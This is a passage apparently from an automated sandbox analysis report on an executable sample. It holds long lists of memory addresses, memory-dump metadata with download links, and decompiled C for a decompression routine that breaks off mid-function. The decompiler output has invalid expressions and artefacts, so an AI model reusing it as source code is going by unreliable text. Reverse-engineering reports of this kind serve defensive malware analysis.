                                                                                                    0x00406535
                                                                                                    0x00406538
                                                                                                    0x00406538
                                                                                                    0x0040653b
                                                                                                    0x00406542
                                                                                                    0x00406547
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004065d5
                                                                                                    0x004065d5
                                                                                                    0x004065d9
                                                                                                    0x00406977
                                                                                                    0x00406977
                                                                                                    0x00000000
                                                                                                    0x00406977
                                                                                                    0x004065df
                                                                                                    0x004065df
                                                                                                    0x004065e2
                                                                                                    0x004065e5
                                                                                                    0x004065e9
                                                                                                    0x004065ec
                                                                                                    0x004065f2
                                                                                                    0x004065f4
                                                                                                    0x004065f4
                                                                                                    0x004065f4
                                                                                                    0x004065f7
                                                                                                    0x004065fa
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004061ca
                                                                                                    0x004061ca
                                                                                                    0x004061ce
                                                                                                    0x0040693b
                                                                                                    0x0040693b
                                                                                                    0x00000000
                                                                                                    0x0040693b
                                                                                                    0x004061d4
                                                                                                    0x004061d4
                                                                                                    0x004061d7
                                                                                                    0x004061da
                                                                                                    0x004061de
                                                                                                    0x004061e1
                                                                                                    0x004061e7
                                                                                                    0x004061e9
                                                                                                    0x004061e9
                                                                                                    0x004061e9
                                                                                                    0x004061ec
                                                                                                    0x004061ef
                                                                                                    0x004061ef
                                                                                                    0x004061f2
                                                                                                    0x004061f5
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004061fb
                                                                                                    0x004061fb
                                                                                                    0x00406201
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00406207
                                                                                                    0x00406207
                                                                                                    0x0040620b
                                                                                                    0x0040620e
                                                                                                    0x00406211
                                                                                                    0x00406214
                                                                                                    0x00406217
                                                                                                    0x00406218
                                                                                                    0x0040621b
                                                                                                    0x0040621d
                                                                                                    0x00406223
                                                                                                    0x00406226
                                                                                                    0x00406229
                                                                                                    0x0040622c
                                                                                                    0x0040622f
                                                                                                    0x00406232
                                                                                                    0x00406235
                                                                                                    0x00406251
                                                                                                    0x00406254
                                                                                                    0x00406257
                                                                                                    0x0040625a
                                                                                                    0x00406261
                                                                                                    0x00406265
                                                                                                    0x00406267
                                                                                                    0x0040626b
                                                                                                    0x00406237
                                                                                                    0x00406237
                                                                                                    0x0040623b
                                                                                                    0x00406243
                                                                                                    0x00406248
                                                                                                    0x0040624a
                                                                                                    0x0040624c
                                                                                                    0x0040624c
                                                                                                    0x0040626e
                                                                                                    0x00406275
                                                                                                    0x00406278
                                                                                                    0x00000000
                                                                                                    0x0040627e
                                                                                                    0x0040627e
                                                                                                    0x00000000
                                                                                                    0x0040627e
                                                                                                    0x00000000
                                                                                                    0x00406283
                                                                                                    0x00406283
                                                                                                    0x00406287
                                                                                                    0x00406947
                                                                                                    0x00406947
                                                                                                    0x00000000
                                                                                                    0x00406947
                                                                                                    0x0040628d
                                                                                                    0x0040628d
                                                                                                    0x00406290
                                                                                                    0x00406293
                                                                                                    0x00406297
                                                                                                    0x0040629a
                                                                                                    0x004062a0
                                                                                                    0x004062a2
                                                                                                    0x004062a2
                                                                                                    0x004062a2
                                                                                                    0x004062a5
                                                                                                    0x004062a8
                                                                                                    0x004062a8
                                                                                                    0x004062a8
                                                                                                    0x004062ae
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004062b0
                                                                                                    0x004062b0
                                                                                                    0x004062b3
                                                                                                    0x004062b6
                                                                                                    0x004062b9
                                                                                                    0x004062bc
                                                                                                    0x004062bf
                                                                                                    0x004062c2
                                                                                                    0x004062c5
                                                                                                    0x004062c8
                                                                                                    0x004062cb
                                                                                                    0x004062ce
                                                                                                    0x004062e6
                                                                                                    0x004062e9
                                                                                                    0x004062ec
                                                                                                    0x004062ef
                                                                                                    0x004062ef
                                                                                                    0x004062f2
                                                                                                    0x004062f6
                                                                                                    0x004062f8
                                                                                                    0x004062d0
                                                                                                    0x004062d0
                                                                                                    0x004062d8
                                                                                                    0x004062dd
                                                                                                    0x004062df
                                                                                                    0x004062e1
                                                                                                    0x004062e1
                                                                                                    0x004062fb
                                                                                                    0x00406302
                                                                                                    0x00406305
                                                                                                    0x00000000
                                                                                                    0x00406307
                                                                                                    0x00406307
                                                                                                    0x00000000
                                                                                                    0x00406307
                                                                                                    0x00406305
                                                                                                    0x0040630c
                                                                                                    0x0040630c
                                                                                                    0x0040630c
                                                                                                    0x0040630c
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00406347
                                                                                                    0x00406347
                                                                                                    0x0040634b
                                                                                                    0x00406953
                                                                                                    0x00406953
                                                                                                    0x00000000
                                                                                                    0x00406953
                                                                                                    0x00406351
                                                                                                    0x00406351
                                                                                                    0x00406354
                                                                                                    0x00406357
                                                                                                    0x0040635b
                                                                                                    0x0040635e
                                                                                                    0x00406364
                                                                                                    0x00406366
                                                                                                    0x00406366
                                                                                                    0x00406366
                                                                                                    0x00406369
                                                                                                    0x0040636c
                                                                                                    0x0040636c
                                                                                                    0x00406372
                                                                                                    0x00406310
                                                                                                    0x00406310
                                                                                                    0x00406313
                                                                                                    0x00000000
                                                                                                    0x00406313
                                                                                                    0x00406374
                                                                                                    0x00406374
                                                                                                    0x00406377
                                                                                                    0x0040637a
                                                                                                    0x0040637d
                                                                                                    0x00406380
                                                                                                    0x00406383
                                                                                                    0x00406386
                                                                                                    0x00406389
                                                                                                    0x0040638c
                                                                                                    0x0040638f
                                                                                                    0x00406392
                                                                                                    0x004063aa
                                                                                                    0x004063ad
                                                                                                    0x004063b0
                                                                                                    0x004063b3
                                                                                                    0x004063b3
                                                                                                    0x004063b6
                                                                                                    0x004063ba
                                                                                                    0x004063bc
                                                                                                    0x00406394
                                                                                                    0x00406394
                                                                                                    0x0040639c
                                                                                                    0x004063a1
                                                                                                    0x004063a3
                                                                                                    0x004063a5
                                                                                                    0x004063a5
                                                                                                    0x004063bf
                                                                                                    0x004063c6
                                                                                                    0x004063c9
                                                                                                    0x00000000
                                                                                                    0x004063cb
                                                                                                    0x004063cb
                                                                                                    0x00000000
                                                                                                    0x004063cb
                                                                                                    0x00000000
                                                                                                    0x00406658
                                                                                                    0x00406658
                                                                                                    0x0040665c
                                                                                                    0x00406983
                                                                                                    0x00406983
                                                                                                    0x00000000
                                                                                                    0x00406983
                                                                                                    0x00406662
                                                                                                    0x00406662
                                                                                                    0x00406665
                                                                                                    0x00406668
                                                                                                    0x0040666c
                                                                                                    0x0040666f
                                                                                                    0x00406675
                                                                                                    0x00406677
                                                                                                    0x00406677
                                                                                                    0x00406677
                                                                                                    0x0040667a
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00406428
                                                                                                    0x00406428
                                                                                                    0x0040642b
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00406767
                                                                                                    0x00406767
                                                                                                    0x0040676b
                                                                                                    0x0040678d
                                                                                                    0x0040678d
                                                                                                    0x00406790
                                                                                                    0x0040679a
                                                                                                    0x0040679d
                                                                                                    0x0040679d
                                                                                                    0x00000000
                                                                                                    0x0040679d
                                                                                                    0x0040676d
                                                                                                    0x0040676d
                                                                                                    0x00406770
                                                                                                    0x00406774
                                                                                                    0x00406777
                                                                                                    0x00406777
                                                                                                    0x0040677a
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00406824
                                                                                                    0x00406824
                                                                                                    0x00406828
                                                                                                    0x00406846
                                                                                                    0x00406846
                                                                                                    0x00406846
                                                                                                    0x00406846
                                                                                                    0x0040684d
                                                                                                    0x00406854
                                                                                                    0x0040685b
                                                                                                    0x0040685b
                                                                                                    0x00406862
                                                                                                    0x00406865
                                                                                                    0x0040686c
                                                                                                    0x00000000
                                                                                                    0x0040686f
                                                                                                    0x0040682a
                                                                                                    0x0040682a
                                                                                                    0x0040682d
                                                                                                    0x00406830
                                                                                                    0x00406833
                                                                                                    0x0040683a
                                                                                                    0x0040677e
                                                                                                    0x0040677e
                                                                                                    0x00406781
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00406915
                                                                                                    0x00406915
                                                                                                    0x00406918
                                                                                                    0x00406819
                                                                                                    0x00406819
                                                                                                    0x00406819
                                                                                                    0x00000000
                                                                                                    0x0040681f
                                                                                                    0x00000000
                                                                                                    0x0040654f
                                                                                                    0x0040654f
                                                                                                    0x00406551
                                                                                                    0x00406558
                                                                                                    0x00406559
                                                                                                    0x0040655b
                                                                                                    0x0040655e
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00406862
                                                                                                    0x00406862
                                                                                                    0x00406865
                                                                                                    0x0040686c
                                                                                                    0x00000000
                                                                                                    0x0040686f
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00406594
                                                                                                    0x00406594
                                                                                                    0x00406597
                                                                                                    0x004065cd
                                                                                                    0x004065cd
                                                                                                    0x004066fd
                                                                                                    0x004066fd
                                                                                                    0x004066fd
                                                                                                    0x004066fd
                                                                                                    0x00406700
                                                                                                    0x00406700
                                                                                                    0x00406703
                                                                                                    0x00406705
                                                                                                    0x0040698f
                                                                                                    0x0040698f
                                                                                                    0x00000000
                                                                                                    0x0040698f
                                                                                                    0x0040670b
                                                                                                    0x0040670b
                                                                                                    0x0040670e
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00406714
                                                                                                    0x00406714
                                                                                                    0x00406718
                                                                                                    0x0040671b
                                                                                                    0x0040671b
                                                                                                    0x0040671b
                                                                                                    0x00000000
                                                                                                    0x0040671b
                                                                                                    0x00406599
                                                                                                    0x00406599
                                                                                                    0x0040659b
                                                                                                    0x0040659d
                                                                                                    0x0040659f
                                                                                                    0x004065a2
                                                                                                    0x004065a3
                                                                                                    0x004065a5
                                                                                                    0x004065a7
                                                                                                    0x004065aa
                                                                                                    0x004065ad
                                                                                                    0x004065c3
                                                                                                    0x004065c3
                                                                                                    0x004065c8
                                                                                                    0x00406600
                                                                                                    0x00406600
                                                                                                    0x00406604
                                                                                                    0x0040662d
                                                                                                    0x00406630
                                                                                                    0x00406632
                                                                                                    0x00406639
                                                                                                    0x0040663c
                                                                                                    0x0040663f
                                                                                                    0x0040663f
                                                                                                    0x00406644
                                                                                                    0x00406644
                                                                                                    0x00406646
                                                                                                    0x00406649
                                                                                                    0x00406650
                                                                                                    0x00406653
                                                                                                    0x00406680
                                                                                                    0x00406680
                                                                                                    0x00406683
                                                                                                    0x00406686
                                                                                                    0x004066fa
                                                                                                    0x004066fa
                                                                                                    0x004066fa
                                                                                                    0x004066fa
                                                                                                    0x00000000
                                                                                                    0x004066fa
                                                                                                    0x00406688
                                                                                                    0x00406688
                                                                                                    0x0040668e
                                                                                                    0x00406691
                                                                                                    0x00406694
                                                                                                    0x00406697
                                                                                                    0x0040669a
                                                                                                    0x0040669d
                                                                                                    0x004066a0
                                                                                                    0x004066a3
                                                                                                    0x004066a6
                                                                                                    0x004066a9
                                                                                                    0x004066c2
                                                                                                    0x004066c4
                                                                                                    0x004066c7
                                                                                                    0x004066c8
                                                                                                    0x004066cb
                                                                                                    0x004066cd
                                                                                                    0x004066d0
                                                                                                    0x004066d2
                                                                                                    0x004066d4
                                                                                                    0x004066d7
                                                                                                    0x004066d9
                                                                                                    0x004066dc
                                                                                                    0x004066e0
                                                                                                    0x004066e2
                                                                                                    0x004066e2
                                                                                                    0x004066e3
                                                                                                    0x004066e6
                                                                                                    0x004066e9
                                                                                                    0x004066ab
                                                                                                    0x004066ab
                                                                                                    0x004066b3
                                                                                                    0x004066b8
                                                                                                    0x004066ba
                                                                                                    0x004066bd
                                                                                                    0x004066bd
                                                                                                    0x004066ec
                                                                                                    0x004066f3
                                                                                                    0x0040667d
                                                                                                    0x0040667d
                                                                                                    0x0040667d
                                                                                                    0x0040667d
                                                                                                    0x00000000
                                                                                                    0x004066f5
                                                                                                    0x004066f5
                                                                                                    0x00000000
                                                                                                    0x004066f5
                                                                                                    0x004066f3
                                                                                                    0x00406606
                                                                                                    0x00406606
                                                                                                    0x00406609
                                                                                                    0x0040660b
                                                                                                    0x0040660e
                                                                                                    0x00406611
                                                                                                    0x00406614
                                                                                                    0x00406616
                                                                                                    0x00406619
                                                                                                    0x0040661c
                                                                                                    0x0040661c
                                                                                                    0x0040661f
                                                                                                    0x0040661f
                                                                                                    0x00406622
                                                                                                    0x00406629
                                                                                                    0x004065fd
                                                                                                    0x004065fd
                                                                                                    0x004065fd
                                                                                                    0x004065fd
                                                                                                    0x00000000
                                                                                                    0x0040662b
                                                                                                    0x0040662b
                                                                                                    0x00000000
                                                                                                    0x0040662b
                                                                                                    0x00406629
                                                                                                    0x004065af
                                                                                                    0x004065af
                                                                                                    0x004065b2
                                                                                                    0x004065b4
                                                                                                    0x004065b7
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00406316
                                                                                                    0x00406316
                                                                                                    0x0040631a
                                                                                                    0x0040695f
                                                                                                    0x0040695f
                                                                                                    0x00000000
                                                                                                    0x0040695f
                                                                                                    0x00406320
                                                                                                    0x00406320
                                                                                                    0x00406323
                                                                                                    0x00406326
                                                                                                    0x00406329
                                                                                                    0x0040632c
                                                                                                    0x0040632f
                                                                                                    0x00406332
                                                                                                    0x00406334
                                                                                                    0x00406337
                                                                                                    0x0040633a
                                                                                                    0x0040633d
                                                                                                    0x0040633f
                                                                                                    0x0040633f
                                                                                                    0x0040633f
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004064a1
                                                                                                    0x004064a1
                                                                                                    0x004064a5
                                                                                                    0x0040696b
                                                                                                    0x0040696b
                                                                                                    0x00000000
                                                                                                    0x0040696b
                                                                                                    0x004064ab
                                                                                                    0x004064ab
                                                                                                    0x004064ae
                                                                                                    0x004064b1
                                                                                                    0x004064b4
                                                                                                    0x004064b6
                                                                                                    0x004064b6
                                                                                                    0x004064b6
                                                                                                    0x004064b9
                                                                                                    0x004064bc
                                                                                                    0x004064bf
                                                                                                    0x004064c2
                                                                                                    0x004064c5
                                                                                                    0x004064c8
                                                                                                    0x004064c9
                                                                                                    0x004064cb
                                                                                                    0x004064cb
                                                                                                    0x004064cb
                                                                                                    0x004064ce
                                                                                                    0x004064d1
                                                                                                    0x004064d4
                                                                                                    0x004064d7
                                                                                                    0x004064d7
                                                                                                    0x004064d7
                                                                                                    0x004064da
                                                                                                    0x004064dc
                                                                                                    0x004064dc
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0040671e
                                                                                                    0x0040671e
                                                                                                    0x0040671e
                                                                                                    0x00406722
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00406728
                                                                                                    0x00406728
                                                                                                    0x0040672b
                                                                                                    0x0040672e
                                                                                                    0x00406731
                                                                                                    0x00406733
                                                                                                    0x00406733
                                                                                                    0x00406733
                                                                                                    0x00406736
                                                                                                    0x00406739
                                                                                                    0x0040673c
                                                                                                    0x0040673f
                                                                                                    0x00406742
                                                                                                    0x00406745
                                                                                                    0x00406746
                                                                                                    0x00406748
                                                                                                    0x00406748
                                                                                                    0x00406748
                                                                                                    0x0040674b
                                                                                                    0x0040674e
                                                                                                    0x00406751
                                                                                                    0x00406754
                                                                                                    0x00406757
                                                                                                    0x0040675b
                                                                                                    0x0040675d
                                                                                                    0x00406760
                                                                                                    0x00000000
                                                                                                    0x00406762
                                                                                                    0x00406762
                                                                                                    0x004064df
                                                                                                    0x004064df
                                                                                                    0x00000000
                                                                                                    0x004064df
                                                                                                    0x00406760
                                                                                                    0x00406995
                                                                                                    0x00406995
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00405fc4
                                                                                                    0x004069cc
                                                                                                    0x004069cc
                                                                                                    0x00000000
                                                                                                    0x004069cc
                                                                                                    0x00406819
                                                                                                    0x00406899
                                                                                                    0x00406862

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.429792160.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.429781321.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429813163.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429828354.0000000000409000.00000008.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429836549.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b47bfdafb4299acf6df14b1a265fb959f908a42d38d0bc6d60d6342fbb02c28f
                                                                                                    • Instruction ID: 319d18918fa2cc3741333e20ed782d5c303dd2f769888eebbc994f2124d7c2e6
                                                                                                    • Opcode Fuzzy Hash: b47bfdafb4299acf6df14b1a265fb959f908a42d38d0bc6d60d6342fbb02c28f
                                                                                                    • Instruction Fuzzy Hash: 29A15171E00229CBDF28CFA8C8547ADBBB1FF44305F15812AD856BB281D7789A96DF44
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00406767, Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 98%
                                                                                                    			E00406767() {
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int* _t605;
				void* _t612;

				L0:
				while(1) {
					L0:
					if( *(_t612 - 0x40) != 0) {
						 *(_t612 - 0x84) = 0x13;
						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x4c);
						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
						__ecx =  *(__ebp - 0x58);
						__eax =  *(__ebp - 0x4c) << 4;
						__eax =  *(__ebp - 0x58) + __eax + 4;
						L130:
						 *(__ebp - 0x58) = __eax;
						 *(__ebp - 0x40) = 3;
						L144:
						 *(__ebp - 0x7c) = 0x14;
						L145:
						__eax =  *(__ebp - 0x40);
						 *(__ebp - 0x50) = 1;
						 *(__ebp - 0x48) =  *(__ebp - 0x40);
						L149:
						if( *(__ebp - 0x48) <= 0) {
							__ecx =  *(__ebp - 0x40);
							__ebx =  *(__ebp - 0x50);
							0 = 1;
							__eax = 1 << __cl;
							__ebx =  *(__ebp - 0x50) - (1 << __cl);
							__eax =  *(__ebp - 0x7c);
							 *(__ebp - 0x44) = __ebx;
							while(1) {
								L140:
								 *(_t612 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t612 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M004069D4))) {
										case 0:
											if( *(_t612 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t534 =  *( *(_t612 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t569);
											_push(9);
											_pop(_t570);
											_t608 = _t538 / _t569;
											_t540 = _t538 % _t569 & 0x000000ff;
											asm("cdq");
											_t603 = _t540 % _t570 & 0x000000ff;
											 *(_t612 - 0x3c) = _t603;
											 *(_t612 - 0x1c) = (1 << _t608) - 1;
											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
											_t611 = (0x300 << _t603 + _t608) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
												L10:
												if(_t611 == 0) {
													L12:
													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t611 = _t611 - 1;
													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
												} while (_t611 != 0);
												goto L12;
											}
											if( *(_t612 - 4) != 0) {
												GlobalFree( *(_t612 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600);
											 *(_t612 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 1;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t45 = _t612 - 0x48;
											 *_t45 =  *(_t612 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t612 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t612 - 0x40);
											if(_t546 ==  *(_t612 - 0x74)) {
												L20:
												 *(_t612 - 0x48) = 5;
												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t612 - 0x74) = _t546;
											if( *(_t612 - 8) != 0) {
												GlobalFree( *(_t612 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40));
											 *(_t612 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
											 *(_t612 - 0x84) = 6;
											 *(_t612 - 0x4c) = _t553;
											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 3;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											_t67 = _t612 - 0x70;
											 *_t67 =  &(( *(_t612 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L23:
											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
											if( *(_t612 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t605;
											_t588 = _t531 & 0x0000ffff;
											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
											if( *(_t612 - 0xc) >= _t564) {
												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
												 *(_t612 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												__eflags = _t532;
												 *_t605 = _t532;
											} else {
												 *(_t612 - 0x10) = _t564;
												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
												 *_t605 = (0x800 - _t588 >> 5) + _t531;
											}
											if( *(_t612 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 5;
												goto L170;
											}
											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L139:
											_t533 =  *(_t612 - 0x84);
											goto L140;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
